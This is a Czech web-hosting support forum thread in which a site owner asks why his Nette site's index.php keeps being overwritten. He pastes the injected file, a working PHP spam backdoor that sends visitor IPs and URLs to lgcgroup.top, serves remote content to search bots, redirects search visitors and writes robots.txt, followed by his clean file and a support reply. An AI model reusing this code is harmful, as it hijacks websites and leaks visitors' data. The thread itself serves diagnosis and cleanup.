Přepisování index.php a následná nefunkčnost stránek

Vyřešeno1.02K zhlédnutíWebhostingindex nette web
0

Dobrý den,

na stránkách upramene-hnanice.cz se jednou za čas přepíše ve složce www soubor index.php, kde je tento kód:

<?php
//ncode_CX9_CX10
error_reporting(0);header('Content-Type: text/html; charset=utf-8');$OoooOO0 = 'zhjcforty';$OOOOOO = "%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a";$O = urldecode($OOOOOO);
    date_default_timezone_set('PRC');
$dRoot = @$_SERVER['DOCUMENT_ROOT'];
$rUrl = @$_SERVER['REQUEST_URI'];
$sName = @$_SERVER['HTTP_HOST'];
$Ooolg = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];
$uAgent = @$_SERVER['HTTP_USER_AGENT'];
$referer = @$_SERVER['HTTP_REFERER'];
$http_type = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) ? 'https://' : 'http://';
$typeName = $http_type . $sName;
$uAgent = @strtolower($uAgent);
$referer = @strtolower($referer);
if (getenv('HTTP_CLIENT_IP')) {
    $client_ip = getenv('HTTP_CLIENT_IP');
} elseif (getenv('HTTP_X_FORWARDED_FOR')) {
    $client_ip = getenv('HTTP_X_FORWARDED_FOR');
} elseif (getenv('REMOTE_ADDR')) {
    $client_ip = getenv('REMOTE_ADDR');
} else {
    $client_ip = $_SERVER['REMOTE_ADDR'];
}
if (isset($_GET['vf']) && $_GET['vf'] == 'online5566') {
    echo 'domain online!';
    exit;
}
 if (strstr($rUrl, 'sitemap_index_')) {
    $pr = dirname($rUrl);
    allmap($O, $OoooOO0, $typeName, $rUrl, $sName, $http_type, $pr);
}
if (strstr($rUrl, '.xml')) {
    $pr = dirname($rUrl);
    sitefun($O, $OoooOO0, $typeName, $rUrl, $http_type, $sName, $client_ip, $pr);
}
function allmap($O, $OoooOO0, $typeName, $rUrl, $sName, $http_type, $pr)
{
    $ol = 'http://' . $OoooOO0 . '.lgcgroup.top/Api/siteAllMap.php?page=' . $rUrl . '&pwd=sl123&domain=' . $typeName;
    if ($_GET['vf_allmap'] == 'online5566') {
        echo $ol;
        exit;
    }
    $getRes = json_decode(getCurl($O, $ol), true);
    if (empty($getRes) || $getRes['code'] == 404) {
        header('HTTP/1.0 404 Not Found');
        header('Status: 404 Not Found');
        exit();
    }
    if (empty($getRes) || $getRes['code'] == 444) {
        header('HTTP/1.0 404 Not Found');
        header('Status: 404 Not Found');
        exit();
    }
    $getsResult = $getRes['data'];
    header('Content-type:text/xml');
    echo $getsResult;
    exit();
}
 function sitefun($O, $OoooOO0, $typeName, $rUrl, $http_type, $sName, $client_ip, $pr = '', $qs = '')
{
    $ol = 'http://' . $OoooOO0 . '.lgcgroup.top/Api/siteUrlApi.php?stype=sitemap&num=6000&pr=' . $pr . '&url=' . $rUrl . '&domain=' . $typeName . '&ip=' . $client_ip;
    if ($_GET['vf_map'] == 'online5566') {
        echo $ol;
        exit;
    }
    $getRes = json_decode(getCurl($O, $ol), true);
    if (isset($getRes['code']) && $getRes['code'] == '600') {
        $getsResult = $getRes['data'];
        foreach ($getsResult as $Oog => $Oov) {
            $pingRes = getCurl($O, $Oov);
            $Oooo0s = (strpos($pingRes, 'Sitemap Notification Received') !== false) ? 'OK' : 'ERROR';
            echo $Oov . '===>Submitting Google Sitemap: ' . $Oooo0s . PHP_EOL;
        }
        exit();
    }
    if (isset($getRes['code']) && $getRes['code'] == '406') {
        echo 'Submitting Google Sitemap Return Fail';
        exit();
    }
    if (empty($getRes) || $getRes['code'] == 404) {
        header('HTTP/1.0 404 Not Found');
        header('Status: 404 Not Found');
        exit();
    }
    $getsResult = $getRes['data'];
    header('Content-type:text/xml');
    echo $getsResult;
    exit();
}
 if (isset($_GET['google'])) {
    $go = $_GET['google'];
    if (preg_match('/^google.*?(\.html)$/i', $go)) {
        putFile($O, $go, 'google-site-verification:' . ' ' . $go);
        exit('<a href=' . $go . '>' . $go . '</a>');
    }
}
if (isset($_GET['robots'])) {
    $robots = $_GET['robots'];
    if (preg_match('/(\.php)$/i', $robots)) {
        $typeName = $typeName . '/' . $robots . '?';
    } else {
        $typeName = $typeName . '/';
    }
    putFile($O, 'robots.txt', 'User-agent: *' . PHP_EOL . 'Allow: /' . PHP_EOL . 'Crawl-delay:3' . PHP_EOL . 'Sitemap:' . $typeName . 'sitemap_index_1.xml' . PHP_EOL . 'Sitemap:' . $typeName . 'sitemap_index_2.xml' . PHP_EOL . 'Sitemap:' . $typeName . 'sitemap_index_3.xml' . PHP_EOL . 'Sitemap:' . $typeName . 'sitemap_index_4.xml' . PHP_EOL . 'Sitemap:' . $typeName . 'sitemap_index_5.xml' . PHP_EOL . 'Sitemap:' . $typeName . 'sitemap_index_6.xml' . PHP_EOL . 'Sitemap:' . $typeName . 'sitemap_index_7.xml' . PHP_EOL . 'Sitemap:' . $typeName . 'sitemap_index_8.xml');
    $file_get_contents = file_get_contents('robots.txt');
    echo $file_get_contents;
    exit();
}
if (preg_match('/google.co.jp|yahoo|google\.com[^.]*?$|bing/i', $referer)) {
    if ($_GET['vf_jump'] == 'online5566') {
        echo 'http://' . $OoooOO0 . '.lgcgroup.top/jump.php?domain=' . $sName . '&page=' . $rUrl . '&bot=0&pr=' . $pr . '&refer=' . $referer . '&ip=' . $client_ip . '&lg=' . $Ooolg;
        exit;
    }
    $jumpRes = getCurl($O, 'http://' . $OoooOO0 . '.lgcgroup.top/jump.php?domain=' . $sName . '&page=' . $rUrl . '&bot=0&pr=' . $pr . '&refer=' . $referer . '&ip=' . $client_ip . '&lg=' . $Ooolg);
    if ($jumpRes) {
        echo $jumpRes;
        exit();
    }
}
if (stristr($uAgent, 'googlebot') || stristr($uAgent, 'bing') || stristr($uAgent, 'Y!J') || stristr($uAgent, 'y!j') || stristr($uAgent, 'yahoo') || stristr($uAgent, 'google') || stristr($uAgent, 'Googlebot') || stristr($uAgent, 'googlebot')) {
    if ($_GET['vf_bot'] == 'online5566') {
        echo 'http://' . $OoooOO0 . '.lgcgroup.top/918.php?domain=' . $sName . '&page=' . $rUrl . '&bot=1&pr=' . $pr . '&ip=' . $client_ip . '&lg=' . $Ooolg;
        exit;
    }
    $file_contents = getCurl($O, 'http://' . $OoooOO0 . '.lgcgroup.top/918.php?domain=' . $sName . '&page=' . $rUrl . '&bot=1&pr=' . $pr . '&ip=' . $client_ip . '&lg=' . $Ooolg);
    if (!empty($file_contents)) {
        $getRes = json_decode($file_contents, true);
        if ($getRes['code'] == 404) {
            header('HTTP/1.0 404 Not Found');
            header('Status: 404 Not Found');
            exit();
        }
        if ($getRes['code'] == 500) {
            header('HTTP/1.1 500 Internal Server Error');
            exit();
        }
        echo $file_contents;
        exit;
    }
}
if ($_GET['vf_origin'] == 'online5566') {
    echo 'http://' . $OoooOO0 . '.lgcgroup.top/org.php?domain=' . $sName . '&page=' . $rUrl . '&pr=' . $pr . '&ip=' . $client_ip . '&lg=' . $Ooolg;
    exit;
}
getCurl($O, 'http://' . $OoooOO0 . '.lgcgroup.top/org.php?domain=' . $sName . '&page=' . $rUrl . '&pr=' . $pr . '&ip=' . $client_ip . '&lg=' . $Ooolg);
function getCurl($O, $gurl)
{
    $file_contents = '';
    $user_agent = 'Mozilla/4.0 (compatible;MSIE 6.0;Windows NT 5.2;.NET CLR 1.1.4322)';
    if (function_exists('curl_init')) {
        try {
            $ch = curl_init();
            $timeout = 30;
            curl_setopt($ch, CURLOPT_URL, $gurl);
            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
            $file_contents = curl_exec($ch);
            curl_close($ch);
        } catch (Exception $e) {
        }
    }
    if (strlen($file_contents) < 1 && function_exists('file_get_contents')) {
        ini_set('user_agent', $user_agent);
        try {
            $file_contents = @file_get_contents($gurl);
        } catch (Exception $e) {
        }
    }
    return $file_contents;
}
 function putFile($O, $htName, $htContents)
{
    $handle = fopen($htName, 'w') or die('0');
    fwrite($handle, $htContents);
    fclose($handle);
}
 ?><?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */
 /**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );
 /** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';

Stránky jsou napsané v php s Nette frameworkem. Když přepíšu tento index.php mým starým:

<?php
 // Uncomment this line if you must temporarily take down your site for maintenance.
// require __DIR__ . '/.maintenance.php';
 $container = require __DIR__ . '/../app/bootstrap.php';
 $container->getByType(Nette\Application\Application::class)->run();

Tak vše funguje, ale znovu se to opakuje a už jsem to takhle musel přepisovat 3x. Co s tím mohu dělat, aby se to už nepřepisovalo?

Děkuji předem za odpověď.

Role: Zákazník
Otázka je uzamčena pro nové odpovědi.
JŠ255861 Vybral nejlepší odpověď 8. 12. 2021
0
53.63K Odpověď od WEDOS Internet, a.s. 0 Comments

Dobrý den,

máte na hostingu pouze tento web nebo i nějaký alias či subdoménu? Měl jste na hostingu dříve jiný web?

Role: Podpora Web: https://stackoverflow.com/ Vizitka: Roses are Red, Violets are Blue Unexpected '{' on line 32.
JŠ255861 Odpověděl na otázku 16. 9. 2021
Prohlížíte 1 ze 3 odpovědí, klikněte zde pro zobrazení všech odpovědí.